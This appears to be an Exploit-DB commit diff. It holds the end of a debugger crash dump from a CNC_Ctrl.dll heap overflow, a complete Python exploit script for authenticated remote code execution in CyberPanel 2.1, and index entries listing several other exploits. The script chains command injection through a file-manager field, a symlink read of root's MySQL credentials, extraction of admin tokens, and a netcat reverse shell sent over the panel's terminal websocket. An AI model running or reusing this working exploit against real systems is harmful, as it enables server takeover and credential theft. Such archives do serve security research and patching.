00afe4e4 41414141 41414141 41414141 41414141 0x41414141
00afe4e8 41414141 41414141 41414141 41414141 0x41414141
00afe4ec 41414141 41414141 41414141 41414141 0x41414141
00afe4f0 41414141 41414141 41414141 41414141 0x41414141
00afe4f4 41414141 41414141 41414141 41414141 0x41414141
00afe4f8 41414141 41414141 41414141 41414141 0x41414141
00afe4fc 41414141 41414141 41414141 41414141 0x41414141
00afe500 41414141 41414141 41414141 41414141 0x41414141
00afe504 41414141 41414141 41414141 41414141 0x41414141
00afe508 41414141 41414141 41414141 41414141 0x41414141
00afe50c 41414141 41414141 41414141 41414141 0x41414141
00afe510 41414141 41414141 41414141 41414141 0x41414141
00afe514 41414141 41414141 41414141 41414141 0x41414141
00afe518 41414141 41414141 41414141 41414141 0x41414141
00afe51c 41414141 41414141 41414141 41414141 0x41414141
00afe520 41414141 41414141 41414141 41414141 0x41414141
00afe524 41414141 41414141 41414141 41414141 0x41414141
00afe528 41414141 41414141 41414141 41414141 0x41414141
00afe52c 41414141 41414141 41414141 41414141 0x41414141
00afe530 41414141 41414141 41414141 41414141 0x41414141
00afe534 41414141 41414141 41414141 41414141 0x41414141
00afe538 41414141 41414141 41414141 41414141 0x41414141
00afe53c 41414141 41414141 41414141 41414141 0x41414141
00afe540 41414141 41414141 41414141 41414141 0x41414141
00afe544 41414141 41414141 41414141 41414141 0x41414141
00afe548 41414141 41414141 41414141 41414141 0x41414141
00afe54c 41414141 41414141 41414141 41414141 0x41414141
00afe550 41414141 41414141 41414141 41414141 0x41414141
00afe554 41414141 41414141 41414141 41414141 0x41414141
00afe558 41414141 41414141 41414141 41414141 0x41414141
00afe55c 41414141 41414141 41414141 41414141 0x41414141
00afe560 41414141 41414141 41414141 41414141 0x41414141
00afe564 41414141 41414141 41414141 41414141 0x41414141
00afe568 41414141 41414141 41414141 41414141 0x41414141
00afe56c 41414141 41414141 41414141 41414141 0x41414141
00afe570 41414141 41414141 41414141 41414141 0x41414141
00afe574 41414141 41414141 41414141 41414141 0x41414141
00afe578 41414141 41414141 41414141 41414141 0x41414141
00afe57c 41414141 41414141 41414141 41414141 0x41414141
00afe580 41414141 41414141 41414141 41414141 0x41414141
00afe584 41414141 41414141 41414141 41414141 0x41414141
00afe588 41414141 41414141 41414141 41414141 0x41414141
00afe58c 41414141 41414141 41414141 41414141 0x41414141
00afe590 41414141 41414141 41414141 41414141 0x41414141
00afe594 41414141 41414141 41414141 41414141 0x41414141
00afe598 41414141 41414141 41414141 41414141 0x41414141
00afe59c 41414141 41414141 41414141 41414141 0x41414141
00afe5a0 41414141 41414141 41414141 41414141 0x41414141
00afe5a4 41414141 41414141 41414141 41414141 0x41414141
00afe5a8 41414141 41414141 41414141 41414141 0x41414141
00afe5ac 41414141 41414141 41414141 41414141 0x41414141
00afe5b0 41414141 41414141 41414141 41414141 0x41414141
00afe5b4 41414141 41414141 41414141 41414141 0x41414141
00afe5b8 41414141 41414141 41414141 41414141 0x41414141
00afe5bc 41414141 41414141 41414141 41414141 0x41414141
00afe5c0 41414141 41414141 41414141 41414141 0x41414141
00afe5c4 41414141 41414141 41414141 41414141 0x41414141
00afe5c8 41414141 41414141 41414141 41414141 0x41414141
00afe5cc 41414141 41414141 41414141 41414141 0x41414141
00afe5d0 41414141 41414141 41414141 41414141 0x41414141
00afe5d4 41414141 41414141 41414141 41414141 0x41414141
00afe5d8 41414141 41414141 41414141 41414141 0x41414141
00afe5dc 41414141 41414141 41414141 41414141 0x41414141
00afe5e0 41414141 41414141 41414141 41414141 0x41414141
00afe5e4 41414141 41414141 41414141 41414141 0x41414141
00afe5e8 41414141 41414141 41414141 41414141 0x41414141
00afe5ec 41414141 41414141 41414141 41414141 0x41414141
00afe5f0 41414141 41414141 41414141 41414141 0x41414141
00afe5f4 41414141 41414141 41414141 41414141 0x41414141
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2
THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1
FAULT_INSTR_CODE: 12d49989
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: CNC_Ctrl
IMAGE_NAME: CNC_Ctrl.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
FAILURE_MODULE_NAME: CNC_Ctrl
BUCKET_ID_MODULE_STR: CNC_Ctrl
FAILURE_FUNCTION_NAME: DllUnregisterServer
BUCKET_ID_FUNCTION_STR: DllUnregisterServer
BUCKET_ID_OFFSET: 18ee3
BUCKET_ID_MODTIMEDATESTAMP: 547ed821
BUCKET_ID_MODCHECKSUM: 357a4b
BUCKET_ID_MODVER_STR: 1.7.0.2
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1
TARGET_TIME: 2021-08-12T11:37:22.000Z
OSBUILD: 19042
OSSERVICEPACK: 1023
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.1023
ANALYSIS_SESSION_ELAPSED_TIME: 68b2
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
Followup: MachineOwner
---------

203
exploits/multiple/webapps/50230.py Executable file
View file

@ -0,0 +1,203 @@
# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: <=2.1
# https://www.youtube.com/watch?v=J_8iLELVgkE
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated)
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
warnings.simplefilter('ignore',InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
parser.add_argument('-l', '--login',help='Username', type=str, required=True)
parser.add_argument('-p', '--password',help='Password', type=str, required=True)
parser.add_argument('-f', '--file',help='File', type=str)
args = parser.parse_args()
exploit(args)
def exploit(args):
def on_open(ws):
verifyPath,socket_password
print("[+] Socket connection successful")
print("[+] Trying a reverse connection")
ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
ws.close()
def on_close(ws, close_status_code, close_msg):
print("[+] Successful")
print("[!] Disconnect from socket")
session = requests.Session()
target = "https://{}:8090".format(args.host)
username = args.login
password = args.password
print("[+] Target {}".format(target))
response = session.get(target, verify=False)
session_hand = session.cookies.get_dict()
token = session_hand["csrftoken"]
print("[+] Token {}".format(token))
headers = {
'X-Csrftoken': token,
'Cookie': 'csrftoken={}'.format(token),
'Referer': target
}
login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
login_json = json.loads(login.content)
if login_json["loginStatus"]:
session_hand_login = session.cookies.get_dict()
print("[+] Login Success")
print("[+] Send request fetch websites list")
headers = {
'X-Csrftoken': session_hand_login["csrftoken"],
'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
'Referer': target
}
feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
feth_weblist_json = json.loads(feth_weblist.content)
if feth_weblist_json["data"]:
weblist_json = json.loads(feth_weblist_json["data"])
domain = weblist_json[0]["domain"]
domain_folder = "/home/{}".format(domain)
print("[+] Successfully {} selected".format(domain))
print("[+] Creating ssh pub")
remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
create_ssh_json = json.loads(create_ssh.content)
if create_ssh_json["status"]:
key = create_ssh_json["deploymentKey"]
print("[+] Key : {}".format(key))
explode_key = key.split()
explode_username = explode_key[-1].split("@")
if explode_username[0]:
username = explode_username[0]
hostname = explode_username[1]
print("[+] {} username selected".format(username))
print("[+] Preparing for symlink attack")
print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
target_file = args.file
if not target_file:
target_file = "/root/.my.cnf"
domain_folder_ssh = "{}/.ssh".format(domain_folder)
command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
completeStartingPath = "{}';{};'".format(domain_folder,command)
#filemanager/controller - completeStartingPath - command execution vulnerability
symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
symlink_json = json.loads(symlink.content)
if symlink_json["status"]:
print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
read_file_json = json.loads(read_file.content)
read_file = read_file_json["deploymentKey"]
if not args.file:
print("-----------------------------------")
print(read_file.strip())
print("-----------------------------------")
mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
print("[+] Fetching users tokens")
completeStartingPath = "{}';{}".format(domain_folder,steal_token)
steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
token_file = domain_folder+"/token.txt"
steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
leak = json.loads(steal_token_read_request.content)
leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
print("------------------------------")
for user in leak:
b64de = base64.b64decode(user).decode('utf-8')
exp_username = b64de.split(":")
if exp_username[0] == "admin":
admin_password = exp_username[1]
print("[+] " + b64de)
print("------------------------------")
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
print("[+] Try login admin")
headers = {
'X-Csrftoken': token,
'Cookie': 'csrftoken={}'.format(token),
'Referer': target
}
login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
login_json = json.loads(login_admin.content)
if login_json["loginStatus"]:
session_hand_login = session.cookies.get_dict()
print("[+] 4dm1n_l061n_5ucc355")
print("[+] c0nn3c71n6_70_73rm1n4l")
headers = {
'X-Csrftoken': session_hand_login["csrftoken"],
'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
'Referer': target
}
get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1]
socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1]
print("[+] verifyPath {}".format(verifyPath))
print("[+] socketPassword {}".format(socket_password))
print("[+] Trying to connect to socket")
ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
on_open=on_open,
on_close=on_close)
ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
else:
print("[-] Auto admin login failed")
else:
print(read_file)
else:
print("[-] Unexpected")
else:
print("[-] Username selected failed")
else:
print("[-] Fail ssh pub")
else:
print("[-] List error")
else:
print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))
if __name__ == "__main__":
init()

3
files_exploits.csv
View file

@ -44354,3 +44354,6 @@ id,file,description,date,author,type,platform,port
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,
50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,
50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.